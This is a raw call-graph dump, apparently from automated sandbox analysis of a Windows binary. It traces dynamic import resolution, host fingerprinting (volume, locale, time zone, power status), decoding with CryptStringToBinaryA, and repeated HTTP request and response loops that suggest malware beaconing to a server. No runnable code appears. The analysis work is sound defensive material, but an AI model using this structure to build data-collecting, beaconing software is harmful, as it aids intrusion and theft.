14111->14112 14113 e43b36 14112->14113 14114 e445c0 2 API calls 14113->14114 14115 e43b4f 14114->14115 14116 e445c0 2 API calls 14115->14116 14117 e43b68 14116->14117 14118 e445c0 2 API calls 14117->14118 14119 e43b81 14118->14119 14120 e445c0 2 API calls 14119->14120 14121 e43b9a 14120->14121 14122 e445c0 2 API calls 14121->14122 14123 e43bb3 14122->14123 14124 e445c0 2 API calls 14123->14124 14125 e43bcc 14124->14125 14126 e445c0 2 API calls 14125->14126 14127 e43be5 14126->14127 14128 e445c0 2 API calls 14127->14128 14129 e43bfe 14128->14129 14130 e445c0 2 API calls 14129->14130 14131 e43c17 14130->14131 14132 e445c0 2 API calls 14131->14132 14133 e43c30 14132->14133 14134 e445c0 2 API calls 14133->14134 14135 e43c49 14134->14135 14136 e445c0 2 API calls 14135->14136 14137 e43c62 14136->14137 14138 e445c0 2 API calls 14137->14138 14139 e43c7b 14138->14139 14140 e445c0 2 API calls 14139->14140 14141 e43c94 14140->14141 14142 e445c0 2 API calls 14141->14142 14143 e43cad 14142->14143 14144 e445c0 2 API calls 14143->14144 14145 e43cc6 14144->14145 14146 e445c0 2 API calls 14145->14146 14147 e43cdf 14146->14147 14148 e445c0 2 API calls 14147->14148 14149 e43cf8 14148->14149 14150 e445c0 2 API calls 14149->14150 14151 e43d11 14150->14151 14152 e445c0 2 API calls 14151->14152 14153 e43d2a 14152->14153 14154 e445c0 2 API calls 14153->14154 14155 e43d43 14154->14155 14156 e445c0 2 API calls 14155->14156 14157 e43d5c 14156->14157 14158 e445c0 2 API calls 14157->14158 14159 e43d75 14158->14159 14160 e445c0 2 API calls 14159->14160 14161 e43d8e 14160->14161 14162 e445c0 2 API calls 14161->14162 14163 e43da7 14162->14163 14164 e445c0 2 API calls 14163->14164 14165 e43dc0 14164->14165 14166 e445c0 2 API calls 14165->14166 14167 e43dd9 14166->14167 14168 e445c0 2 API calls 14167->14168 14169 e43df2 14168->14169 14170 e445c0 2 API calls 14169->14170 14171 e43e0b 14170->14171 14172 e445c0 2 API calls 14171->14172 14173 e43e24 14172->14173 14174 e445c0 2 API calls 14173->14174 14175 e43e3d 14174->14175 14176 e445c0 2 API calls 14175->14176 14177 e43e56 14176->14177 14178 e445c0 2 API calls 14177->14178 14179 e43e6f 14178->14179 14180 e445c0 2 API calls 14179->14180 14181 e43e88 14180->14181 14182 e445c0 2 API calls 14181->14182 14183 e43ea1 14182->14183 14184 e445c0 2 API calls 14183->14184 14185 e43eba 14184->14185 14186 e445c0 2 API calls 14185->14186 14187 e43ed3 14186->14187 14188 e445c0 2 API calls 14187->14188 14189 e43eec 14188->14189 14190 e445c0 2 API calls 14189->14190 14191 e43f05 14190->14191 14192 e445c0 2 API calls 14191->14192 14193 e43f1e 14192->14193 14194 e445c0 2 API calls 14193->14194 14195 e43f37 14194->14195 14196 e445c0 2 API calls 14195->14196 14197 e43f50 14196->14197 14198 e445c0 2 API calls 14197->14198 14199 e43f69 14198->14199 14200 e445c0 2 API calls 14199->14200 14201 e43f82 14200->14201 14202 e445c0 2 API calls 14201->14202 14203 e43f9b 14202->14203 14204 e445c0 2 API calls 14203->14204 14205 e43fb4 14204->14205 14206 e445c0 2 API calls 14205->14206 14207 e43fcd 14206->14207 14208 e445c0 2 API calls 14207->14208 14209 e43fe6 14208->14209 14210 e445c0 2 API calls 14209->14210 14211 e43fff 14210->14211 14212 e445c0 2 API calls 14211->14212 14213 e44018 14212->14213 14214 e445c0 2 API calls 14213->14214 14215 e44031 14214->14215 14216 e445c0 2 API calls 14215->14216 14217 e4404a 14216->14217 14218 e445c0 2 API calls 14217->14218 14219 e44063 14218->14219 14220 e445c0 2 API calls 14219->14220 14221 e4407c 14220->14221 14222 e445c0 2 API calls 14221->14222 14223 e44095 14222->14223 14224 e445c0 2 API calls 14223->14224 14225 e440ae 14224->14225 14226 e445c0 2 API calls 14225->14226 14227 e440c7 14226->14227 14228 e445c0 2 API calls 14227->14228 14229 e440e0 14228->14229 14230 e445c0 2 API calls 14229->14230 14231 e440f9 14230->14231 14232 e445c0 2 API calls 14231->14232 14233 e44112 14232->14233 14234 e445c0 2 API calls 14233->14234 14235 e4412b 14234->14235 14236 e445c0 2 API calls 14235->14236 14237 e44144 14236->14237 14238 e445c0 2 API calls 14237->14238 14239 e4415d 14238->14239 14240 e445c0 2 API calls 14239->14240 14241 e44176 14240->14241 14242 e445c0 2 API calls 14241->14242 14243 e4418f 14242->14243 14244 e445c0 2 API calls 14243->14244 14245 e441a8 14244->14245 14246 e445c0 2 API calls 14245->14246 14247 e441c1 14246->14247 14248 e445c0 2 API calls 14247->14248 14249 e441da 14248->14249 14250 e445c0 2 API calls 14249->14250 14251 e441f3 14250->14251 14252 e445c0 2 API calls 14251->14252 14253 e4420c 14252->14253 14254 e445c0 2 API calls 14253->14254 14255 e44225 14254->14255 14256 e445c0 2 API calls 14255->14256 14257 e4423e 14256->14257 14258 e445c0 2 API calls 14257->14258 14259 e44257 14258->14259 14260 e445c0 2 API calls 14259->14260 14261 e44270 14260->14261 14262 e445c0 2 API calls 14261->14262 14263 e44289 14262->14263 14264 e445c0 2 API calls 14263->14264 14265 e442a2 14264->14265 14266 e445c0 2 API calls 14265->14266 14267 e442bb 14266->14267 14268 e445c0 2 API calls 14267->14268 14269 e442d4 14268->14269 14270 e445c0 2 API calls 14269->14270 14271 e442ed 14270->14271 14272 e445c0 2 API calls 14271->14272 14273 e44306 14272->14273 14274 e445c0 2 API calls 14273->14274 14275 e4431f 14274->14275 14276 e445c0 2 API calls 14275->14276 14277 e44338 14276->14277 14278 e445c0 2 API calls 14277->14278 14279 e44351 14278->14279 14280 e445c0 2 API calls 14279->14280 14281 e4436a 14280->14281 14282 e445c0 2 API calls 14281->14282 14283 e44383 14282->14283 14284 e445c0 2 API calls 14283->14284 14285 e4439c 14284->14285 14286 e445c0 2 API calls 14285->14286 14287 e443b5 14286->14287 14288 e445c0 2 API calls 14287->14288 14289 e443ce 14288->14289 14290 e445c0 2 API calls 14289->14290 14291 e443e7 14290->14291 14292 e445c0 2 API calls 14291->14292 14293 e44400 14292->14293 14294 e445c0 2 API calls 14293->14294 14295 e44419 14294->14295 14296 e445c0 2 API calls 14295->14296 14297 e44432 14296->14297 14298 e445c0 2 API calls 14297->14298 14299 e4444b 14298->14299 14300 e445c0 2 API calls 14299->14300 14301 e44464 14300->14301 14302 e445c0 2 API calls 14301->14302 14303 e4447d 14302->14303 14304 e445c0 2 API calls 14303->14304 14305 e44496 14304->14305 14306 e445c0 2 API calls 14305->14306 14307 e444af 14306->14307 14308 e445c0 2 API calls 14307->14308 14309 e444c8 14308->14309 14310 e445c0 2 API calls 14309->14310 14311 e444e1 14310->14311 14312 e445c0 2 API calls 14311->14312 14313 e444fa 14312->14313 14314 e445c0 2 API calls 14313->14314 14315 e44513 14314->14315 14316 e445c0 2 API calls 14315->14316 14317 e4452c 14316->14317 14318 e445c0 2 API calls 14317->14318 14319 e44545 14318->14319 14320 e445c0 2 API calls 14319->14320 14321 e4455e 14320->14321 14322 e445c0 2 API calls 14321->14322 14323 e44577 14322->14323 14324 e445c0 2 API calls 14323->14324 14325 e44590 14324->14325 14326 e445c0 2 API calls 14325->14326 14327 e445a9 14326->14327 14328 e59c10 14327->14328 14329 e5a036 8 API calls 14328->14329 14330 e59c20 43 API calls 14328->14330 14331 e5a146 14329->14331 14332 e5a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14329->14332 14330->14329 14333 e5a216 14331->14333 14334 e5a153 8 API calls 14331->14334 14332->14331 14335 e5a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14333->14335 14336 e5a298 14333->14336 14334->14333 14335->14336 14337 e5a2a5 6 API calls 14336->14337 14338 e5a337 14336->14338 14337->14338 14339 e5a344 9 API calls 14338->14339 14340 e5a41f 14338->14340 14339->14340 14341 e5a4a2 14340->14341 14342 e5a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14340->14342 14343 e5a4dc 14341->14343 14344 e5a4ab GetProcAddress GetProcAddress 14341->14344 14342->14341 14345 e5a515 14343->14345 14346 e5a4e5 GetProcAddress GetProcAddress 14343->14346 14344->14343 14347 e5a612 14345->14347 14348 e5a522 10 API calls 14345->14348 14346->14345 14349 e5a67d 14347->14349 14350 e5a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14347->14350 14348->14347 14351 e5a686 GetProcAddress 14349->14351 14352 e5a69e 14349->14352 14350->14349 14351->14352 14353 e5a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14352->14353 14354 e55ca3 14352->14354 14353->14354 14355 e41590 14354->14355 15474 e41670 14355->15474 14358 e5a7a0 lstrcpy 14359 e415b5 14358->14359 14360 e5a7a0 lstrcpy 14359->14360 14361 e415c7 14360->14361 14362 e5a7a0 lstrcpy 14361->14362 14363 e415d9 14362->14363 14364 e5a7a0 lstrcpy 14363->14364 14365 e41663 14364->14365 14366 e55510 14365->14366 14367 e55521 14366->14367 14368 e5a820 2 API calls 14367->14368 14369 e5552e 14368->14369 14370 e5a820 2 API calls 14369->14370 14371 e5553b 14370->14371 14372 e5a820 2 API calls 14371->14372 14373 e55548 14372->14373 14374 e5a740 lstrcpy 14373->14374 14375 e55555 14374->14375 14376 e5a740 lstrcpy 14375->14376 14377 e55562 14376->14377 14378 e5a740 lstrcpy 14377->14378 14379 e5556f 14378->14379 14380 e5a740 lstrcpy 14379->14380 14400 e5557c 14380->14400 14381 e552c0 25 API calls 14381->14400 14382 e551f0 20 API calls 14382->14400 14383 e55643 StrCmpCA 14383->14400 14384 e556a0 StrCmpCA 14385 e557dc 14384->14385 14384->14400 14386 e5a8a0 lstrcpy 14385->14386 14387 e557e8 14386->14387 14388 e5a820 2 API calls 14387->14388 14391 e557f6 14388->14391 14389 e5a740 lstrcpy 14389->14400 14390 e5a820 lstrlen lstrcpy 14390->14400 14393 e5a820 2 API calls 14391->14393 14392 e55856 StrCmpCA 14394 e55991 14392->14394 14392->14400 14396 e55805 14393->14396 14395 e5a8a0 lstrcpy 14394->14395 14397 e5599d 14395->14397 14398 e41670 lstrcpy 14396->14398 14399 e5a820 2 API calls 14397->14399 14419 e55811 14398->14419 14401 e559ab 14399->14401 14400->14381 14400->14382 14400->14383 14400->14384 14400->14389 14400->14390 14400->14392 14402 e55a0b StrCmpCA 14400->14402 14406 e5a7a0 lstrcpy 14400->14406 14411 e41590 lstrcpy 14400->14411 14416 e5578a StrCmpCA 14400->14416 14418 e5593f StrCmpCA 14400->14418 14420 e5a8a0 lstrcpy 14400->14420 14403 e5a820 2 API calls 14401->14403 14404 e55a16 Sleep 14402->14404 14405 e55a28 14402->14405 14407 e559ba 14403->14407 14404->14400 14408 e5a8a0 lstrcpy 14405->14408 14406->14400 14409 e41670 lstrcpy 14407->14409 14410 e55a34 14408->14410 14409->14419 14412 e5a820 2 API calls 14410->14412 14411->14400 14413 e55a43 14412->14413 14414 e5a820 2 API calls 14413->14414 14415 e55a52 14414->14415 14417 e41670 lstrcpy 14415->14417 14416->14400 14417->14419 14418->14400 14419->13473 14420->14400 14422 e57553 GetVolumeInformationA 14421->14422 14423 e5754c 14421->14423 14424 e57591 14422->14424 14423->14422 14425 e575fc GetProcessHeap RtlAllocateHeap 14424->14425 14426 e57619 14425->14426 14427 e57628 wsprintfA 14425->14427 14428 e5a740 lstrcpy 14426->14428 14429 e5a740 lstrcpy 14427->14429 14430 e55da7 14428->14430 14429->14430 14430->13494 14432 e5a7a0 lstrcpy 14431->14432 14433 e44899 14432->14433 15483 e447b0 14433->15483 14435 e448a5 14436 e5a740 lstrcpy 14435->14436 14437 e448d7 14436->14437 14438 e5a740 lstrcpy 14437->14438 14439 e448e4 14438->14439 14440 e5a740 lstrcpy 14439->14440 14441 e448f1 14440->14441 14442 e5a740 lstrcpy 14441->14442 14443 e448fe 14442->14443 14444 e5a740 lstrcpy 14443->14444 14445 e4490b InternetOpenA StrCmpCA 14444->14445 14446 e44944 14445->14446 14447 e44ecb InternetCloseHandle 14446->14447 15489 e58b60 14446->15489 14448 e44ee8 14447->14448 15504 e49ac0 CryptStringToBinaryA 14448->15504 14450 e44963 15497 e5a920 14450->15497 14453 e44976 14455 e5a8a0 lstrcpy 14453->14455 14460 e4497f 14455->14460 14456 e5a820 2 API calls 14457 e44f05 14456->14457 14458 e5a9b0 4 API calls 14457->14458 14461 e44f1b 14458->14461 14459 e44f27 codecvt 14462 e5a7a0 lstrcpy 14459->14462 14464 e5a9b0 4 API calls 14460->14464 14463 e5a8a0 lstrcpy 14461->14463 14475 e44f57 14462->14475 14463->14459 14465 e449a9 14464->14465 14466 e5a8a0 lstrcpy 14465->14466 14467 e449b2 14466->14467 14468 e5a9b0 4 API calls 14467->14468 14469 e449d1 14468->14469 14470 e5a8a0 lstrcpy 14469->14470 14471 e449da 14470->14471 14472 e5a920 3 API calls 14471->14472 14473 e449f8 14472->14473 14474 e5a8a0 lstrcpy 14473->14474 14476 e44a01 14474->14476 14475->13497 14477 e5a9b0 4 API calls 14476->14477 14478 e44a20 14477->14478 14479 e5a8a0 lstrcpy 14478->14479 14480 e44a29 14479->14480 14481 e5a9b0 4 API calls 14480->14481 14482 e44a48 14481->14482 14483 e5a8a0 lstrcpy 14482->14483 14484 e44a51 14483->14484 14485 e5a9b0 4 API calls 14484->14485 14486 e44a7d 14485->14486 14487 e5a920 3 API calls 14486->14487 14488 e44a84 14487->14488 14489 e5a8a0 lstrcpy 14488->14489 14490 e44a8d 14489->14490 14491 e44aa3 InternetConnectA 14490->14491 14491->14447 14492 e44ad3 HttpOpenRequestA 14491->14492 14494 e44ebe InternetCloseHandle 14492->14494 14495 e44b28 14492->14495 14494->14447 14496 e5a9b0 4 API calls 14495->14496 14497 e44b3c 14496->14497 14498 e5a8a0 lstrcpy 14497->14498 14499 e44b45 14498->14499 14500 e5a920 3 API calls 14499->14500 14501 e44b63 14500->14501 14502 e5a8a0 lstrcpy 14501->14502 14503 e44b6c 14502->14503 14504 e5a9b0 4 API calls 14503->14504 14505 e44b8b 14504->14505 14506 e5a8a0 lstrcpy 14505->14506 14507 e44b94 14506->14507 14508 e5a9b0 4 API calls 14507->14508 14509 e44bb5 14508->14509 14510 e5a8a0 lstrcpy 14509->14510 14511 e44bbe 14510->14511 14512 e5a9b0 4 API calls 14511->14512 14513 e44bde 14512->14513 14514 e5a8a0 lstrcpy 14513->14514 14515 e44be7 14514->14515 14516 e5a9b0 4 API calls 14515->14516 14517 e44c06 14516->14517 14518 e5a8a0 lstrcpy 14517->14518 14519 e44c0f 14518->14519 14520 e5a920 3 API calls 14519->14520 14521 e44c2d 14520->14521 14522 e5a8a0 lstrcpy 14521->14522 14523 e44c36 14522->14523 14524 e5a9b0 4 API calls 14523->14524 14525 e44c55 14524->14525 14526 e5a8a0 lstrcpy 14525->14526 14527 e44c5e 14526->14527 14528 e5a9b0 4 API calls 14527->14528 14529 e44c7d 14528->14529 14530 e5a8a0 lstrcpy 14529->14530 14531 e44c86 14530->14531 14532 e5a920 3 API calls 14531->14532 14533 e44ca4 14532->14533 14534 e5a8a0 lstrcpy 14533->14534 14535 e44cad 14534->14535 14536 e5a9b0 4 API calls 14535->14536 14537 e44ccc 14536->14537 14538 e5a8a0 lstrcpy 14537->14538 14539 e44cd5 14538->14539 14540 e5a9b0 4 API calls 14539->14540 14541 e44cf6 14540->14541 14542 e5a8a0 lstrcpy 14541->14542 14543 e44cff 14542->14543 14544 e5a9b0 4 API calls 14543->14544 14545 e44d1f 14544->14545 14546 e5a8a0 lstrcpy 14545->14546 14547 e44d28 14546->14547 14548 e5a9b0 4 API calls 14547->14548 14549 e44d47 14548->14549 14550 e5a8a0 lstrcpy 14549->14550 14551 e44d50 14550->14551 14552 e5a920 3 API calls 14551->14552 14553 e44d6e 14552->14553 14554 e5a8a0 lstrcpy 14553->14554 14555 e44d77 14554->14555 14556 e5a740 lstrcpy 14555->14556 14557 e44d92 14556->14557 14558 e5a920 3 API calls 14557->14558 14559 e44db3 14558->14559 14560 e5a920 3 API calls 14559->14560 14561 e44dba 14560->14561 14562 e5a8a0 lstrcpy 14561->14562 14563 e44dc6 14562->14563 14564 e44de7 lstrlen 14563->14564 14565 e44dfa 14564->14565 14566 e44e03 lstrlen 14565->14566 15503 e5aad0 14566->15503 14568 e44e13 HttpSendRequestA 14569 e44e32 InternetReadFile 14568->14569 14570 e44e67 InternetCloseHandle 14569->14570 14575 e44e5e 14569->14575 14573 e5a800 14570->14573 14572 e5a9b0 4 API calls 14572->14575 14573->14494 14574 e5a8a0 lstrcpy 14574->14575 14575->14569 14575->14570 14575->14572 14575->14574 15510 e5aad0 14576->15510 14578 e517c4 StrCmpCA 14579 e517cf ExitProcess 14578->14579 14591 e517d7 14578->14591 14580 e519c2 14580->13499 14581 e518ad StrCmpCA 14581->14591 14582 e518cf StrCmpCA 14582->14591 14583 e518f1 StrCmpCA 14583->14591 14584 e51951 StrCmpCA 14584->14591 14585 e51970 StrCmpCA 14585->14591 14586 e51913 StrCmpCA 14586->14591 14587 e51932 StrCmpCA 14587->14591 14588 e5185d StrCmpCA 14588->14591 14589 e5187f StrCmpCA 14589->14591 14590 e5a820 lstrlen lstrcpy 14590->14591 14591->14580 14591->14581 14591->14582 14591->14583 14591->14584 14591->14585 14591->14586 14591->14587 14591->14588 14591->14589 14591->14590 14593 e5a7a0 lstrcpy 14592->14593 14594 e45979 14593->14594 14595 e447b0 2 API calls 14594->14595 14596 e45985 14595->14596 14597 e5a740 lstrcpy 14596->14597 14598 e459ba 14597->14598 14599 e5a740 lstrcpy 14598->14599 14600 e459c7 14599->14600 14601 e5a740 lstrcpy 14600->14601 14602 e459d4 14601->14602 14603 e5a740 lstrcpy 14602->14603 14604 e459e1 14603->14604 14605 e5a740 lstrcpy 14604->14605 14606 e459ee InternetOpenA StrCmpCA 14605->14606 14607 e45a1d 14606->14607 14608 e45fc3 InternetCloseHandle 14607->14608 14610 e58b60 3 API calls 14607->14610 14609 e45fe0 14608->14609 14612 e49ac0 4 API calls 14609->14612 14611 e45a3c 14610->14611 14613 e5a920 3 API calls 14611->14613 14614 e45fe6 14612->14614 14615 e45a4f 14613->14615 14617 e5a820 2 API calls 14614->14617 14620 e4601f codecvt 14614->14620 14616 e5a8a0 lstrcpy 14615->14616 14621 e45a58 14616->14621 14618 e45ffd 14617->14618 14619 e5a9b0 4 API calls 14618->14619 14622 e46013 14619->14622 14623 e5a7a0 lstrcpy 14620->14623 14625 e5a9b0 4 API calls 14621->14625 14624 e5a8a0 lstrcpy 14622->14624 14634 e4604f 14623->14634 14624->14620 14626 e45a82 14625->14626 14627 e5a8a0 lstrcpy 14626->14627 14628 e45a8b 14627->14628 14629 e5a9b0 4 API calls 14628->14629 14630 e45aaa 14629->14630 14631 e5a8a0 lstrcpy 14630->14631 14632 e45ab3 14631->14632 14633 e5a920 3 API calls 14632->14633 14635 e45ad1 14633->14635 14634->13505 14636 e5a8a0 lstrcpy 14635->14636 14637 e45ada 14636->14637 14638 e5a9b0 4 API calls 14637->14638 14639 e45af9 14638->14639 14640 e5a8a0 lstrcpy 14639->14640 14641 e45b02 14640->14641 14642 e5a9b0 4 API calls 14641->14642 14643 e45b21 14642->14643 14644 e5a8a0 lstrcpy 14643->14644 14645 e45b2a 14644->14645 14646 e5a9b0 4 API calls 14645->14646 14647 e45b56 14646->14647 14648 e5a920 3 API calls 14647->14648 14649 e45b5d 14648->14649 14650 e5a8a0 lstrcpy 14649->14650 14651 e45b66 14650->14651 14652 e45b7c InternetConnectA 14651->14652 14652->14608 14653 e45bac HttpOpenRequestA 14652->14653 14655 e45fb6 InternetCloseHandle 14653->14655 14656 e45c0b 14653->14656 14655->14608 14657 e5a9b0 4 API calls 14656->14657 14658 e45c1f 14657->14658 14659 e5a8a0 lstrcpy 14658->14659 14660 e45c28 14659->14660 14661 e5a920 3 API calls 14660->14661 14662 e45c46 14661->14662 14663 e5a8a0 lstrcpy 14662->14663 14664 e45c4f 14663->14664 14665 e5a9b0 4 API calls 14664->14665 14666 e45c6e 14665->14666 14667 e5a8a0 lstrcpy 14666->14667 14668 e45c77 14667->14668 14669 e5a9b0 4 API calls 14668->14669 14670 e45c98 14669->14670 14671 e5a8a0 lstrcpy 14670->14671 14672 e45ca1 14671->14672 14673 e5a9b0 4 API calls 14672->14673 14674 e45cc1 14673->14674 14675 e5a8a0 lstrcpy 14674->14675 14676 e45cca 14675->14676 14677 e5a9b0 4 API calls 14676->14677 14678 e45ce9 14677->14678 14679 e5a8a0 lstrcpy 14678->14679 14680 e45cf2 14679->14680 14681 e5a920 3 API calls 14680->14681 14682 e45d10 14681->14682 14683 e5a8a0 lstrcpy 14682->14683 14684 e45d19 14683->14684 14685 e5a9b0 4 API calls 14684->14685 14686 e45d38 14685->14686 14687 e5a8a0 lstrcpy 14686->14687 14688 e45d41 14687->14688 14689 e5a9b0 4 API calls 14688->14689 14690 e45d60 14689->14690 14691 e5a8a0 lstrcpy 14690->14691 14692 e45d69 14691->14692 14693 e5a920 3 API calls 14692->14693 14694 e45d87 14693->14694 14695 e5a8a0 lstrcpy 14694->14695 14696 e45d90 14695->14696 14697 e5a9b0 4 API calls 14696->14697 14698 e45daf 14697->14698 14699 e5a8a0 lstrcpy 14698->14699 14700 e45db8 14699->14700 14701 e5a9b0 4 API calls 14700->14701 14702 e45dd9 14701->14702 14703 e5a8a0 lstrcpy 14702->14703 14704 e45de2 14703->14704 14705 e5a9b0 4 API calls 14704->14705 14706 e45e02 14705->14706 14707 e5a8a0 lstrcpy 14706->14707 14708 e45e0b 14707->14708 14709 e5a9b0 4 API calls 14708->14709 14710 e45e2a 14709->14710 14711 e5a8a0 lstrcpy 14710->14711 14712 e45e33 14711->14712 14713 e5a920 3 API calls 14712->14713 14714 e45e54 14713->14714 14715 e5a8a0 lstrcpy 14714->14715 14716 e45e5d 14715->14716 14717 e45e70 lstrlen 14716->14717 15511 e5aad0 14717->15511 14719 e45e81 lstrlen GetProcessHeap RtlAllocateHeap 15512 e5aad0 14719->15512 14721 e45eae lstrlen 14722 e45ebe 14721->14722 14723 e45ed7 lstrlen 14722->14723 14724 e45ee7 14723->14724 14725 e45ef0 lstrlen 14724->14725 14726 e45f03 14725->14726 14727 e45f1a lstrlen 14726->14727 15513 e5aad0 14727->15513 14729 e45f2a HttpSendRequestA 14730 e45f35 InternetReadFile 14729->14730 14731 e45f6a InternetCloseHandle 14730->14731 14735 e45f61 14730->14735 14731->14655 14733 e5a9b0 4 API calls 14733->14735 14734 e5a8a0 lstrcpy 14734->14735 14735->14730 14735->14731 14735->14733 14735->14734 14738 e51077 14736->14738 14737 e51151 14737->13507 14738->14737 14739 e5a820 lstrlen lstrcpy 14738->14739 14739->14738 14745 e50db7 14740->14745 14741 e50f17 14741->13515 14742 e50ea4 StrCmpCA 14742->14745 14743 e50e27 StrCmpCA 14743->14745 14744 e50e67 StrCmpCA 14744->14745 14745->14741 14745->14742 14745->14743 14745->14744 14746 e5a820 lstrlen lstrcpy 14745->14746 14746->14745 14748 e50f67 14747->14748 14749 e51044 14748->14749 14750 e50fb2 StrCmpCA 14748->14750 14751 e5a820 lstrlen lstrcpy 14748->14751 14749->13523 14750->14748 14751->14748 14753 e5a740 lstrcpy 14752->14753 14754 e51a26 14753->14754 14755 e5a9b0 4 API calls 14754->14755 14756 e51a37 14755->14756 14757 e5a8a0 lstrcpy 14756->14757 14758 e51a40 14757->14758 14759 e5a9b0 4 API calls 14758->14759 14760 e51a5b 14759->14760 14761 e5a8a0 lstrcpy 14760->14761 14762 e51a64 14761->14762 14763 e5a9b0 4 API calls 14762->14763 14764 e51a7d 14763->14764 14765 e5a8a0 lstrcpy 14764->14765 14766 e51a86 14765->14766 14767 e5a9b0 4 API calls 14766->14767 14768 e51aa1 14767->14768 14769 e5a8a0 lstrcpy 14768->14769 14770 e51aaa 14769->14770 14771 e5a9b0 4 API calls 14770->14771 14772 e51ac3 14771->14772 14773 e5a8a0 lstrcpy 14772->14773 14774 e51acc 14773->14774 14775 e5a9b0 4 API calls 14774->14775 14776 e51ae7 14775->14776 14777 e5a8a0 lstrcpy 14776->14777 14778 e51af0 14777->14778 14779 e5a9b0 4 API calls 14778->14779 14780 e51b09 14779->14780 14781 e5a8a0 lstrcpy 14780->14781 14782 e51b12 14781->14782 14783 e5a9b0 4 API calls 14782->14783 14784 e51b2d 14783->14784 14785 e5a8a0 lstrcpy 14784->14785 14786 e51b36 14785->14786 14787 e5a9b0 4 API calls 14786->14787 14788 e51b4f 14787->14788 14789 e5a8a0 lstrcpy 14788->14789 14790 e51b58 14789->14790 14791 e5a9b0 4 API calls 14790->14791 14792 e51b76 14791->14792 14793 e5a8a0 lstrcpy 14792->14793 14794 e51b7f 14793->14794 14795 e57500 6 API calls 14794->14795 14796 e51b96 14795->14796 14797 e5a920 3 API calls 14796->14797 14798 e51ba9 14797->14798 14799 e5a8a0 lstrcpy 14798->14799 14800 e51bb2 14799->14800 14801 e5a9b0 4 API calls 14800->14801 14802 e51bdc 14801->14802 14803 e5a8a0 lstrcpy 14802->14803 14804 e51be5 14803->14804 14805 e5a9b0 4 API calls 14804->14805 14806 e51c05 14805->14806 14807 e5a8a0 lstrcpy 14806->14807 14808 e51c0e 14807->14808 15514 e57690 GetProcessHeap RtlAllocateHeap 14808->15514 14811 e5a9b0 4 API calls 14812 e51c2e 14811->14812 14813 e5a8a0 lstrcpy 14812->14813 14814 e51c37 14813->14814 14815 e5a9b0 4 API calls 14814->14815 14816 e51c56 14815->14816 14817 e5a8a0 lstrcpy 14816->14817 14818 e51c5f 14817->14818 14819 e5a9b0 4 API calls 14818->14819 14820 e51c80 14819->14820 14821 e5a8a0 lstrcpy 14820->14821 14822 e51c89 14821->14822 15521 e577c0 GetCurrentProcess IsWow64Process 14822->15521 14825 e5a9b0 4 API calls 14826 e51ca9 14825->14826 14827 e5a8a0 lstrcpy 14826->14827 14828 e51cb2 14827->14828 14829 e5a9b0 4 API calls 14828->14829 14830 e51cd1 14829->14830 14831 e5a8a0 lstrcpy 14830->14831 14832 e51cda 14831->14832 14833 e5a9b0 4 API calls 14832->14833 14834 e51cfb 14833->14834 14835 e5a8a0 lstrcpy 14834->14835 14836 e51d04 14835->14836 14837 e57850 3 API calls 14836->14837 14838 e51d14 14837->14838 14839 e5a9b0 4 API calls 14838->14839 14840 e51d24 14839->14840 14841 e5a8a0 lstrcpy 14840->14841 14842 e51d2d 14841->14842 14843 e5a9b0 4 API calls 14842->14843 14844 e51d4c 14843->14844 14845 e5a8a0 lstrcpy 14844->14845 14846 e51d55 14845->14846 14847 e5a9b0 4 API calls 14846->14847 14848 e51d75 14847->14848 14849 e5a8a0 lstrcpy 14848->14849 14850 e51d7e 14849->14850 14851 e578e0 3 API calls 14850->14851 14852 e51d8e 14851->14852 14853 e5a9b0 4 API calls 14852->14853 14854 e51d9e 14853->14854 14855 e5a8a0 lstrcpy 14854->14855 14856 e51da7 14855->14856 14857 e5a9b0 4 API calls 14856->14857 14858 e51dc6 14857->14858 14859 e5a8a0 lstrcpy 14858->14859 14860 e51dcf 14859->14860 14861 e5a9b0 4 API calls 14860->14861 14862 e51df0 14861->14862 14863 e5a8a0 lstrcpy 14862->14863 14864 e51df9 14863->14864 15523 e57980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14864->15523 14867 e5a9b0 4 API calls 14868 e51e19 14867->14868 14869 e5a8a0 lstrcpy 14868->14869 14870 e51e22 14869->14870 14871 e5a9b0 4 API calls 14870->14871 14872 e51e41 14871->14872 14873 e5a8a0 lstrcpy 14872->14873 14874 e51e4a 14873->14874 14875 e5a9b0 4 API calls 14874->14875 14876 e51e6b 14875->14876 14877 e5a8a0 lstrcpy 14876->14877 14878 e51e74 14877->14878 15525 e57a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14878->15525 14881 e5a9b0 4 API calls 14882 e51e94 14881->14882 14883 e5a8a0 lstrcpy 14882->14883 14884 e51e9d 14883->14884 14885 e5a9b0 4 API calls 14884->14885 14886 e51ebc 14885->14886 14887 e5a8a0 lstrcpy 14886->14887 14888 e51ec5 14887->14888 14889 e5a9b0 4 API calls 14888->14889 14890 e51ee5 14889->14890 14891 e5a8a0 lstrcpy 14890->14891 14892 e51eee 14891->14892 15528 e57b00 GetUserDefaultLocaleName 14892->15528 14895 e5a9b0 4 API calls 14896 e51f0e 14895->14896 14897 e5a8a0 lstrcpy 14896->14897 14898 e51f17 14897->14898 14899 e5a9b0 4 API calls 14898->14899 14900 e51f36 14899->14900 14901 e5a8a0 lstrcpy 14900->14901 14902 e51f3f 14901->14902 14903 e5a9b0 4 API calls 14902->14903 14904 e51f60 14903->14904 14905 e5a8a0 lstrcpy 14904->14905 14906 e51f69 14905->14906 15532 e57b90 14906->15532 14908 e51f80 14909 e5a920 3 API calls 14908->14909 14910 e51f93 14909->14910 14911 e5a8a0 lstrcpy 14910->14911 14912 e51f9c 14911->14912 14913 e5a9b0 4 API calls 14912->14913 14914 e51fc6 14913->14914 14915 e5a8a0 lstrcpy 14914->14915 14916 e51fcf 14915->14916 14917 e5a9b0 4 API calls 14916->14917 14918 e51fef 14917->14918 14919 e5a8a0 lstrcpy 14918->14919 14920 e51ff8 14919->14920 15544 e57d80 GetSystemPowerStatus 14920->15544 14923 e5a9b0 4 API calls 14924 e52018 14923->14924 14925 e5a8a0 lstrcpy 14924->14925 14926 e52021 14925->14926 14927 e5a9b0 4 API calls 14926->14927 14928 e52040 14927->14928 14929 e5a8a0 lstrcpy 14928->14929 14930 e52049 14929->14930 14931 e5a9b0 4 API calls 14930->14931 14932 e5206a 14931->14932 14933 e5a8a0 